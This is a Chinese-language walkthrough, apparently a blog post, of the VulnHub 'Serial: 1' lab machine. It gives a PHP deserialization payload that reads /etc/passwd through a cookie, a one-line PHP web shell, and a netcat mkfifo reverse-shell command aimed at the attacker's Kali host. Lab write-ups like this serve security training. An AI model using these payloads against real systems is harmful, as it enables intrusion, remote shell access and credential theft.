反序列化--serial

去vulhub上下载此靶机:
https://www.vulnhub.com/entry/serial-1,349/
用Vmware新建虚拟机打开

用kali扫描ip  arp-scan -l

访问扫描到的靶机ip访问

按F12 ---》网络---》cookie得到一串编码

base64解码

dirb http://靶机ip   扫描目录

访问backup目录

解压得到三个php文件

构造payload

<?php
  class Log {
    private $type_log = "/etc/passwd";
  }
 
  class User {
    private $name = "admin";
    private $wel;
 
    function __construct() {
      $this->wel = new Log();
  }
}
$obj = new User();
echo base64_encode(serialize($obj));
?>

访问构造好的php文件获取到base64编码后的字节序列

抓包,将编码后的数据抓包后替换红色部分

写一个cmd.txt文件

<?php @system($ GET['cmd']); ?>

修改palyload改为本机ip加上我们创建的文件

访问重新修改的gouzao.php文件

攻击模块替换 查询ip

成功执行反弹shell

讲以下参数修改为kali  ip 和指定端口去kali监听

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.162.129+8888+>/tmp/f

开启监听  

查找txt文件

查看账号密码

用御剑扫描端口

远程连接 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值